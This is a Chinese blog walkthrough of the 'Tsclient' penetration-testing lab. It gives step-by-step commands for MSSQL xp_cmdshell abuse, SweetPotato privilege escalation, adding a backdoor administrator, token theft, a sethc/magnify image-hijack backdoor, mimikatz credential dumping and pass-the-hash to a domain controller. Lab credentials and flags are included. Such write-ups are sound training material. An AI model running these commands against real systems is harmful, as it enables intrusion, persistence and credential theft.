春秋云境Tsclient-WP【一遍过】

已于 2023-10-12 14:39:46 修改
阅读量351 收藏
点赞数 2
分类专栏: 渗透 文章标签: 安全
于 2023-10-05 11:16:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63576152/article/details/133578138
版权

flag01

fscan扫一下,找到mssql数据库的ip、端口、用户名以及密码

mssql:39.99.132.19:1433:sa 1qaz!QAZ

MDUT工具连接(如果报错的话就重新安装一个)

激活组件xp_cmdshell

执行一下whoami命令,可以看到执行成功

MDUT的文件管理中上传SweetPotato.exe

提权,提升到管理员权限

SweetPotato.exe路径 -a whoami

获得flag01

SweetPotato.exe路径 -a "type C:\Users\Administrator\flag\flag01.txt"

或者用下面的命令添加用户test,远程登录

SweetPotato.exe路径 -a "net user test qwer1234! /add"
SweetPotato.exe路径 -a "net localgroup administrators test /add"
SweetPotato.exe路径 -a "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"

flag01: flag{dd5b46c4-850d-4605-8b68-e74ac29d7ed3}

flag02

查看网络情况

ipconfig

上传fscan64.exe扫一下内网

fscan64.exe路径 -h 172.22.8.18/24

内网情况如下

172.22.8.15 域控
172.22.8.31 域内机器
172.22.8.18 已拿下
172.22.8.46 域内机器

quser查看计算机上的用户会话信息(quser命令在windows server和windows的某些专业版才适用)

可以看到有一个john用户(或者用net user)

继续收集信息,查看网络连接情况

netstat -no

发现3389端口和另一个域内机器有连接,即172.22.8.31

用管理员权限运行cmd(一定要用管理员身份运行!),使用模拟令牌看看john账户(下载地址

SharpToken.exe execute "WIN-WEB\John" cmd true

出现错误

在控制面板找到服务器管理器

服务器管理器-->管理-->添加角色1 和功能-->功能-->勾选.net3.5进行安装

执行net use,发现一个共享

里面有一个敏感文件,查看后获取一个凭证和一个提示(镜像劫持)

dir \\TSCLIENT\C
type \\TSCLIENT\C\credential.txt

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

frpc复制粘贴进去,启动一下,再开启proxifier

使用rdesktop远程连接

proxychains rdesktop 172.22.8.31:3389

显示密码过期

修改密码之后还是登录不了

但是可以登录到172.22.8.46,再开一个mstsc远程连接

查看权限,当前用户是普通用户,没有管理员权限

net group "domain admins" /domain
net config workstation

下面利用之前提示的镜像劫持

先看看注册表权限(PowerShell命令)

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

这里发现普通用户也可以对下面的注册表进行创建和写入

HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

那么可以通过以下命令设置shift后门

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

或者利用锁定界面的放大镜提权

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

锁定用户,连续按5下shift,弹出管理员终端

直接type就能获得flag

type "C:\Users\Administrator\flag\flag02.txt"

flag02:flag{6043b693-fb03-4234-83be-8c3830a78b62}

flag03

上传mimikatz,用shift后门启动管理员权限的cmd,运行mimikatz,执行命令

privilege::debug
log
sekurlsa::logonpasswords

用mimikatz 注入hash到lsass进程中

privilege::debug
sekurlsa::pth /user:WIN2016$ /domain:jugg /ntlm:72c36246f7bcf98cea1f42ecccf48b50

运行完会跳出一个命令框,直接通过命令行可以访问域控的文件

获取flag03

dir \\172.22.8.15\c$\users\administrator\flag
type \\172.22.8.15\c$\users\administrator\flag\flag03.txt

flag03:flag{0b6a2de9-a22c-4a8f-95cb-2917474fbbd0}

ps:flag是动态的

Jugg_xie
关注
专栏目录
Ichunqiu云境 —— Tsclient Writeup
WUfagg的博客
12-12 805
MSSQL,Privilege Escalation,Kerberos,域渗透,RDP
TPM:TSClient LEGACY软件包管理器(TPM)-TSClient LEGACY ThinClient操作系统的软件包管理器。 它完全用OCaml编写,并使用GNU Tar,GNU Gzip和来自GNU Coreutils或类似程序的工具
02-03
TSClient LEGACY的TPM,全称为ThinClient Package Manager,是一款专为TSClient LEGACY ThinClient操作系统设计的软件包管理器。这个工具的主要职责是简化软件的安装、更新和卸载过程,确保在瘦客户端环境中高效且...
WP-春秋云境-Tsclient专业徽章通关指南-flag01
qq_45234543的博客
01-04 863
Wp-春秋云镜Tsclient专业徽章Flag01
【内网渗透】最保姆级的春秋云镜Tsclient打靶笔记
最新发布
uuzeray的博客
08-22 738
提示STATUS_PASSWORD_EXPIRED也就是密码过期了,需要使用smbpasswd进行修改密码。172.22.8.46不出网,用172.22.8.18转发上线CS。测出来只有172.22.8.46可以连接。有在线用户可以用CS注入进程上线。上传SweetPotato提权。拿到一套账密,并提示打映像劫持。用PTH打DC,读到flag3。上传fscan和frp相关。致敬经典,选择用放大镜提权。sqlsever权限很低。用John查看共享资源。成功以SYSTEM上线。
【内网渗透】春秋云镜 Tsclient WP
Sapphire037的博客
05-15 1203
mssql连接和攻击、windows提权、令牌窃取、镜像劫持。
靶场练习--春秋云境-Tsclient
NoooEmotion的博客
01-28 2332
Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。
春秋云镜靶场挑战——Tsclient
Cobra的博客
03-25 2891
目标IP:39.98.73.212 网络拓扑 入口机器 1、使用namp对目标IP进行扫描,发现目标开放了1433端口(MSSQL服务),3389端口(RDP服务) 2、可以先爆破MSSQL服务,如下可以看出成爆破出密码 3、使用MDUT工具连接Mssql 4、使用xp_cmdshell执行命令发现只有一个比较地低的权限 5、使用CS生成木马,利用MDUT上传木马 6、执行木马上线CS C:/Users/Public/beacon.exe 7、使用土豆提
TPM2:TSClient LEGACY软件包管理器(TPM)的版本2-TSClient LEGACY ThinClient操作系统的软件包管理器的第二版本完全用C ++编写。 它使用GNU Tar,zlib,TinyXML2和SQLite作为软件包数据库
02-04
TPM2,全称为TSClient LEGACY的软件包管理器的第二版本,是专为TSClient LEGACY ThinClient操作系统设计的一个高效且强大的工具。这个软件包管理器是完全使用C++编程语言编写的,体现了C++在系统级编程中的应用优势...
tsclient:寒意打字稿客户端
04-14
tsclient 安装 yarn add @getchill.app/tsclient 用法 import { Credentials , rpcService , RPCService , certPath , RPCError } from '@getchill.app/tsclient' export const creds : Credentials = new ...
Terminal Server Client [tsclient]:项目已被https://sourceforge.net/projects/remmina/取代-开源
05-14
终端服务器客户端[tsclient]是rdesktop和其他远程桌面工具的GTK2前端。 该项目已被Remmina取代-https://sourceforge.net/projects/remmina/
春秋云境Initial WP
m0_62466350的博客
12-05 1183
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)[外链图片转存中…(img-SvBaevSt-1701756474326)]1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)
SweetPotato:SweetPotato修改版,用于webshel​​l下执行命令
03-19
甜土豆 感谢@zcgonvh和@RcoIl两位师傅的耐心指导
春秋云境】CVE-2022-28512靶场WP
果粒程
11-26 1282
春秋云境】CVE-2022-28512靶场WP
春秋云境Flarum-WP一遍过】
weixin_63576152的博客
10-17 556
一种类似于yso但是针对php的反序列化利用工具,这里为了可控文件头,我们使用phpggc来生成tar格式包,里面内容就是反弹shell的命令。写个马好上蚁剑(/var/www/html/public/assets目录下才有权限,后面的文件上传也是一样)接着访问一下主页39.xx.xx.xx/assets/forum.css确保css样式已经成功修改。连接蚁剑http://39.xx.xx.xx/assets/1.php。申请票据,无密码连接(前面不知道为什么报错了,所以这里利用失败了)
春秋云境Exchange-WP一遍过】
weixin_63576152的博客
10-13 595
BloodHound 分析(我的sharphound会报错没有连接ldap,不知道为什么),发现exchange这台机器上的域用户有writeDacl权限,也就是zhangtong,因此可以写 DCSync。burpsuit抓包,改为/user/list?search=,再添加exp,发送。导出后做成字典passwd.txt,爆破得到密码(速度惊人得快),找到flag03。用刚改的密码登录之前的outlook网页,翻邮件知道密码是手机号。官方插件(右上角)-> 华夏ERP,找找漏洞,可以打jdbc。
【渗透测试】Tsclient-春秋云镜 极致的工具化打法!
m0_74272345的博客
10-03 792
这个靶场是纯Windows靶场,有很多难点,也有很多可扩展学习的地方。fscan爆出MSSQL弱口令,通过MDUT工具拿下WIN-WEBRDP贯穿整个内网渗透的思路,是这个靶场的核心john用户用tsclient挂载C盘到WIN-WEB,把域内主机用户密码给泄露了,可以做密码喷洒攻击(密码碰撞)映像劫持提权:放大镜这个是直接拿WP的用,可以扩展学习impacket工具包的使用作为一个学习渗透从B站红队笔记开始的人,春秋云镜的靶场很多的使用工具让人有点略微不适应。
春秋云境】CVE-2022-23134靶场WP和CVE-2022-22965靶场WP
果粒程
12-05 1223
春秋云境】CVE-2022-23134靶场WP和CVE-2022-22965靶场WP
春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
果粒程
12-08 1661
春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
\\TSCLIENT\D\ZP20.XLS,是什么意思
03-20
很抱歉,根据你提供的信息,我无法准确回答你关于"\\TSCLIENT\D\ZP20.XLS"的问题。"\\TSCLIENT\D\ZP20.XLS"看起来像是一个文件路径,但我无法确定具体是什么文件或者它的含义。如果你能提供更多的背景信息或者问题的上下文,我将尽力帮助你解答。以下是一些可能有助于你的问题: 1. "TSCLIENT"是什么意思? 2. "D"代表什么? 3. "ZP20.XLS"是什么类型的文件? 4. 你需要关于该文件的哪方面的信息? 请提供更多详细信息,以便我能够更好地回答你的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值